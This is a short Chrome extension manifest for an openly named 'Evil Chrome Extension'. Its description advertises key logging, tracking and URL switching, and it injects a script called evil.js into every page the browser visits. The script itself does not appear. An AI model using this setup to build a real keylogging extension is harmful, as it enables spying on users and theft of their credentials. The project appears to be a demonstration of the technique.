{
    "manifest_version": 2,
    "name": "Evil Chrome Extension",
    "description": "Key logging, tracking, url switching, and other tricks.",
    "version": "0.1",
    "icons": {
      "16": "icons/16.png",
      "48": "icons/48.png",
      "128": "icons/128.png"
    },
    "content_scripts": [
      {
        "matches": [
          "<all_urls>"
        ],
        "js": ["lib/jquery.min.js", "src/evil.js"],
        "run_at": "document_end"
      }
    ]
}
